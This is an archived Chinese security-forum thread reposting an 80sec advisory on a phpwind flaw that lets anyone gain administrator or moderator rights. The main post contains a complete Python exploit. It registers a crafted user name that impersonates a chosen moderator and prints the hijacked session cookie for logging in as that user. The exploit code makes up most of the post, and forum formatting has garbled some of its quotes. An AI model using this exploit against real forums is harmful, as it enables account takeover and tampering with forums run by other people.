找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 825|回复: 1

phpwind管理权限泄露漏洞+利用程序

[复制链接]

1

主题

77

回帖

103

牛毛

一级牛人

积分
103
发表于 2008-6-21 22:53:51 | 显示全部楼层 来自 广东省广州市黄埔区
黑糊糊黑糊糊黑糊糊后

264

主题

210

回帖

621

牛毛

一级牛人

要不  我也改

积分
621
 楼主| 发表于 2008-6-1 12:53:53 | 显示全部楼层 |阅读模式 来自 陕西省西安市
利用程序是Python写的。
漏洞发布:http://www.80sec.com/
漏洞作者:jianxin@80sec.com
漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害:高
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作


利用方式:http://www.80sec.com有提供exploit
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限
漏洞修补:建议关闭注册功能等待官方出补丁
漏洞状态:
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞
暂无补丁
原始地址:http://www.80sec.com/release/phpwind-exploit.txt
漏洞测试:
复制内容到剪贴板代码:
# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.[wiki]HTTP[/wiki]Connection.debuglevel = 1
cookies = urllib2.HTT[wiki]PC[/wiki]ookieProcessor()
opener = urllib2.build_opener(cookies)

def banner():
  print \"\"
  print \"########################################################\"
  print \"Phpwind所有版本管理权限泄露漏洞利用poc\"
  print \"Copyright (C) 2006\"
  print \"jianxin@80sec.com\"
  print \"80sec是一个新的致力于[wiki]web[/wiki][wiki]安全[/wiki]的小团体\"
  print \"http://www.80sec.com\"

def usage():
  banner()
  print \"Usage:\\n\"
  print \"  $ ./phpwind.py pwforumurl usertoattack\\n\"
  print \"  pwforumurl  目标论坛地址如http://www.80sec.com/\"
  print \"  usertoattack  目标拥有权限的斑竹或管理员\"
  print \"  攻击结果将会在目标论坛注册一个和目标用户一样的帐户\"
  print \"  最新版本可以使用uid登陆\"
  print \"  其他版本可以使用cookie+useragent登陆\"
  print \"########################################################\"
  print \"\"

argvs=sys.argv
usage()

data = \"regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2\" % (argvs[2],”%c1″)
pwurl = “%s/register.php” % argvs[1]

request = urllib2.Request(
  url   = pwurl ,
    headers = {’Content-Type’ : ‘application/x-www-form-urlencoded’,'User-Agent’: ’80sec owned this’},
    data  = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers[\"set-cookie\"]
try:
  if cookie.index(’winduser’):
    print “Exploit Success!”
    print “Login with uid password @80sec or Cookie:”
    print cookie
    print “User-agent: 80sec owned this”
except:
  print “Error! http://www.80sec.com
  print “Connect root#80sec.com”
转载时请注明本帖子地址:http://www.hrhack.com/thread-2126-1-1.html
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-12 06:48 , Processed in 0.132099 second(s), 28 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表